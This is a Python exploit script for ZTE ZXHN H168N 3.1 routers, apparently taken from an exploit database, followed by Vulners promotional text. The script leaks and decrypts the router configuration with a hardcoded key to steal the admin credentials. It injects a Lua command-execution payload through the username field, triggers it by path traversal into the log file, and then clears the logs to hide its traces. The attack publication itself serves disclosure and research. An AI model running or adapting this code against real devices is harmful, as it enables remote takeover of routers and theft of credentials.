# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES
def login(host, port, username, password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"Username": username,
"Password": password,
"Frm_Logintoken": "",
"action": "login"
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def logout(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_LogOff": "1",
"IF_LanguageSwitch": "",
"IF_ModeSwitch": ""
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def leak_config(host, port):
conn = http.client.HTTPConnection(host, port)
boundary = "---------------------------25853724551472601545982946443"
body = (
f"{boundary}\r\n"
'Content-Disposition: form-data; name="config"\r\n'
"\r\n"
"\r\n"
f"{boundary}--\r\n"
)
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Content-Length": str(len(body)),
"Connection": "keep-alive",
}
conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
response = conn.getresponse()
response_data = response.read()
with open("config.bin", "wb") as file:
file.write(response_data)
conn.close()
def _read_exactly(fd, size, desc="data"):
chunk = fd.read(size)
if len(chunk) != size:
return None
return chunk
def _read_struct(fd, fmt, desc="struct"):
size = struct.calcsize(fmt)
data = _read_exactly(fd, size, desc)
if data is None:
return None
return struct.unpack(fmt, data)
def read_aes_data(fd_in, key):
encrypted_data = b""
while True:
aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
if aes_hdr is None:
return None
_, chunk_len, marker = aes_hdr
chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
if chunk is None:
return None
encrypted_data += chunk
if marker == 0:
break
cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
fd_out = BytesIO()
fd_out.write(cipher.decrypt(encrypted_data))
fd_out.seek(0)
return fd_out
def read_compressed_data(fd_in, enc_header):
hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
if enc_header[6] != hdr_crc:
return None
total_crc = 0
fd_out = BytesIO()
while True:
comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
if comp_hdr is None:
return None
uncompr_len, compr_len, marker = comp_hdr
chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
if chunk is None:
return None
total_crc = zlib.crc32(chunk, total_crc)
uncompressed = zlib.decompress(chunk)
if len(uncompressed) != uncompr_len:
return None
fd_out.write(uncompressed)
if marker == 0:
break
if enc_header[5] != total_crc:
return None
fd_out.seek(0)
return fd_out
def read_config(fd_in, fd_out, key):
ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
if ver_header_1 is None:
return
ver_header_2_offset = 0x14 + ver_header_1[4]
fd_in.seek(ver_header_2_offset)
ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
if ver_header_2 is None:
return
ver_header_3_offset = ver_header_2[10]
fd_in.seek(ver_header_3_offset)
ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
if ver_header_3 is None:
return
signed_cfg_size = ver_header_3[3]
file_size = stat(fd_in.name).st_size
fd_in.seek(0x80)
sign_header = _read_struct(fd_in, ">3I", desc="signature header")
if sign_header is None:
return
if sign_header[0] != 0x04030201:
return
sign_length = sign_header[2]
signature = _read_exactly(fd_in, sign_length, desc="signature")
if signature is None:
return
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = encryption_header[1]
if enc_type in (1, 2):
if not key:
return
fd_in = read_aes_data(fd_in, key)
if fd_in is None:
return
if enc_type == 2:
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = 0
if enc_type == 0:
fd_in = read_compressed_data(fd_in, encryption_header)
if fd_in is None:
return
fd_out.write(fd_in.read())
def decrypt_config(config_key):
encrypted = open("config.bin", "rb")
decrypted = open("decrypted.xml", "wb")
read_config(encrypted, decrypted, config_key)
with open("decrypted.xml", "r") as file:
contents = file.read()
username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
encrypted.close()
os.system("rm config.bin")
decrypted.close()
os.system("rm decrypted.xml")
return username, password
def change_log_level(host, port, log_level):
level_map = {
"critical": "2",
"notice": "5"
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_BASICCONIG": "Y",
"LogEnable": "1",
"LogLevel": level_map[log_level],
"ServiceEnable": "0",
"Btn_cancel_LogManagerConf": "",
"Btn_apply_LogManagerConf": "",
"downloadlog": "",
"Btn_clear_LogManagerConf": "",
"Btn_save_LogManagerConf": "",
"Btn_refresh_LogManagerConf": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def change_username(host, port, new_username, old_password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_InstID": "IGD.AU2",
"Right": "2",
"Username": new_username,
"Password": old_password,
"NewPassword": old_password,
"NewConfirmPassword": old_password,
"Btn_cancel_AccountManag": "",
"Btn_apply_AccountManag": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)
def clear_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "clearlog"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def refresh_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Refresh"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def trigger_rce(host, port):
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")
def rce(cmd):
return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"
def pwn(config_key, host, port):
leak_config(host, port)
username, password = decrypt_config(config_key)
login(host, port, username, password)
shellcode = "echo \"pwned\""
payload = rce(shellcode)
change_username(host, port, payload, password)
refresh_log(host, port)
change_log_level(host, port, "notice")
refresh_log(host, port)
trigger_rce(host, port)
clear_log(host, port)
change_username(host, port, username, password)
change_log_level(host, port, "critical")
logout(host, port)
print("[+] PoC complete")
def main():
parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz<vz&f^9", help="Leaked config encryption key from cspd")
parser.add_argument("--host", required=True, help="Target IP address of the router")
parser.add_argument("--port", required=True, type=int, help="Target port of the router")
args = parser.parse_args()
pwn(args.config_key, args.host, args.port)
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation